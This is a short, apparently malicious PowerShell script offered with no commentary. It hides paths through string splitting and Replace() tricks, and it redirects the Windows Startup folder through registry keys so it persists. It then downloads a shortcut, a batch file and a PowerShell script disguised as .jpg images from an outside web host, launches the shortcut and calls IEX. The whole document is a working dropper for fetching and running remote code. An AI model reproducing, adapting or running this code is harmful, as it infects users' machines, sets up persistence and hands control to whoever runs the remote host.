Function NJXH
[system.io.directory]::CreateDirectory("C:\P"+"r"+"o"+"g"+"r"+"a"+"m"+"D"+"a"+"t"+"a"+"\"+"M"+"i"+"c"+"r"+"o"+"s"+"o"+"f"+"t A"+"r"+"t"+"s"+"\"+"S"+"t"+"a"+"r"+"t"+"\")
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
start-sleep -s 5
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" -Name "Startup" -Value "C:\ProgramData\Microsoft Arts\Start";
$d = 'C:\Pro-3-51-351-153-53-153-tart\'.Replace("-3-51-351-153-53-153-","gramData\Microsoft Arts\S")
$xbox4 = 'C:\-rwy-hrw-hrd-fs-hdt-dh-ic\'.Replace("-rwy-hrw-hrd-fs-hdt-dh-","Users\Publ")
$zoelliox = 'C:\-gea-gea-ega-ga-a-va-eg-ic\'.Replace("-gea-gea-ega-ga-a-va-eg-","Users\Publ")
start-sleep -s 5
if((New-Object System.Net.WebClient).DownloadFile('https://perfectionscommunication.com/wp-content/languages/firefox.lnk', $d + 'firefox.lnk')){
if((New-Object System.Net.WebClient).DownloadFile('https://perfectionscommunication.com/wp-content/languages/Microsoft.jpg', $xbox4 + 'Microsoft.bat')){
if((New-Object System.Net.WebClient).DownloadFile('https://perfectionscommunication.com/wp-content/languages/bHA6E6GTarMBgLEd.jpg' , $zoelliox + 'fLyYUnbkOMvmwlWQ.ps1')){
start "C:\ProgramData\Microsoft Arts\Start\firefox.lnk"
IEX NJXH